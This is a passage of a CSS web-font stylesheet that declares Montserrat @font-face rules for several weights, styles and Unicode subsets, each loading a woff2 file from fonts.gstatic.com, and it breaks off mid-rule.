url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dJ9pQOik20.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dJ9pQOi.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTn89ddpQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTn89ddpROi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face 